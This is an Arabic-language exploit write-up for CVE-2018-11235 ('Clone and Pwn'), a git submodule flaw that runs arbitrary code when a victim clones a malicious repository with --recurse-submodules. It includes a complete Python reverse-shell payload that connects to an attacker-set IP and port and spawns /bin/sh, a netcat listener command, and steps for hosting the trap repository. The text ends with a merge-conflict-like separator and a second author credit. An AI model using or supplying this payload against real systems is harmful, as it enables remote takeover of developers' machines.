
يستغل CVE-2018-11235
عنوان الاستغلال: Clone and Pwn
التاريخ: 4 يونيو 2018
مؤلف الاستغلال: Alejandro Caceres
الصفحة الرئيسية للمورد: https://git-scm.com/
رابط البرنامج: https://git-scm.com/downloads
الإصدار: يتم تنفيذ تعليمات برمجية عشوائية على إصدارات عميل git في Git قبل 2.13.7، و2.14.x قبل 2.14.4، و2.15.x قبل 2.15.2، و2.16.x قبل 2.16.4، و2.17.x قبل 2.17.1
اختُبر على: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235
CVE-2018-11235، الملقب هنا بـ «clone and pwn»، يُنشئ مستودع git خبيثًا يستغل ثغرة في git. عند استنساخ المستودع باستخدام علم --recurse-submodules، يتم تنفيذ تعليمات برمجية عشوائية على إصدارات عميل git في Git قبل 2.13.7، و2.14.x قبل 2.14.4، و2.15.x قبل 2.15.2، و2.16.x قبل 2.16.4، و2.17.x قبل 2.17.1.
لاستخدام هذه الوحدة، ضعها ببساطة على خادم لديه وصول مباشر إلى الإنترنت (مثل AWS أو digital ocean) وافتح evil.sh. ستبدو شيئًا مثل ما يلي:
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
اضبط EXTERN_IP وEXTERN_PORT على عنوان IP (الخارجي) والمنفذ الذي ترغب في استقبال الصدفة العكسية عليه. يمكن استقبال الصدفة العكسية بشيء مثل:
nc -l <EXTERN_IP> EXTERN_PORT على سبيل المثال nc -l 193.23.23.32 8080
أو باستخدام وحدة الصدفة العامة في Metasploit. بمجرد أن يشغّل المستخدم الأمر git clone --recurse-submodules git://<your ip>/repo dest_dir، سوف تستلم صدفة عكسية.
إذا كنت تواجه مشكلة في التشغيل عدة مرات (أو بعد محاولة فاشلة)، تحقق مما يلي:
ps aux | grep git للتأكد من أنك لا تشغّل gitdaemon بالفعل. اقتل أي عمليات gitdaemon.الكود مشتق من git patch الخاص بـ @peff (ابحث عن ملف الاختبار t/t7415-submodule-names.sh).
وعليه، يُنشر هذا المستودع بموجب رخصة GNU العمومية العامة الإصدار 2.
إصلاح إضافي للإصدارات الأقدم من git بفضل @atorralba (التفاصيل في هذا المنشور).
هذا السكريبت مقتبس من https://github.com/Rogdham/CVE-2018-11235، مع الكثير من الحب والتقدير
=======
يستغل CVE-2018-11235
بقلم @_hyp3ri0n و@mehaase